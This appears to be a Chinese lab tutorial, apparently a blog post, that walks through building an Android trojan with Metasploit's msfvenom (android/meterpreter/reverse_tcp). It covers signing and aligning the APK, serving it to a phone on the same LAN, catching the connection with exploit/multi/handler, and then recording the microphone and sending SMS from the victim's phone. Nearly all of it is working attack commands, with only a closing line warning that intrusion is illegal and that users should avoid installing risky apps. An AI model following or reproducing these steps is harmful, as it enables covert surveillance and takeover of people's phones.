本实验是在kail里面使用msf工具生成一个Android木马程序,然后客户端进行下载,从而渗透。
实验范围为局域网的手机,即入侵的手机要与电脑处于同一个网段,这就需要将虚拟机设置为桥接模式,并手动配置ip。

此时手机的ip段为192.168.43.0段故需要更改虚拟机ip
vim /etc/network/interfaces
更改静态ip、网关等 
重启虚拟机网络配置
systemctl restart networking
查看ip地址 
连通性测试

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.38 lport=5555 R>zzh.apk
其中lhost后面是虚拟机端的ip地址,lport也是虚拟机的端口号(256以上可以随便设置,尽量大点)。后面跟的zzh.apk为生成的Android程序名称。


zipalign -v 4 zzh.apk GRIT.apk
zipalign -v 4 原Apk 优化完Apk地址
输出结果为如下图:

此时该路径下应该有两个apk文件一个是最初始的zzh.apk,一个是对齐后的GRIT.apk

keytool -genkey -v -keystore zzh.keystore -alias zzh -keyalg RSA -keysize 2084 -validity 365
-alias 产生别名(zzh)
-keystore 指定密钥库的名称(就像数据库一样的证书库,可以有很多个证书,cacerts这个文件是jre自带的,你也可以使用其它文件名字,如果没有这个文件名字,它会创建这样一个这里为zzh.keystore)
-v 显示密钥库中的证书详细信息
-validity 指定创建的证书有效期多少天(365)
-keysize 指定密钥长度(2084)-keyalg RSA(算法)


apksigner sign --ks zzh.keystore --ks-key-alias zzh GRIT.apk
apksigner sign --ks (签名地址zzh.keystore) --ks-key-alias (别名zzh) (待签名的apk地址)

此处需要输入密码为生成密钥对时设置的密码 。
将上面的设置完成后就可以将GRIT.apk下载到手机上进行实验了

service apache2 start




最后的结果弹出版本旧,哈哈,到这步手机部分已经结束了....
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.43.38
set lport 5555








record_mic录音加上-d参数指定录音时长(秒)
send_sms -d 号码 -t "信息"
根据国家安全法,非法入侵一定是犯法的,此次实验主要是告诉我们以后看到无视风险安装和退出安装,记得一定把控住点退出安装啊。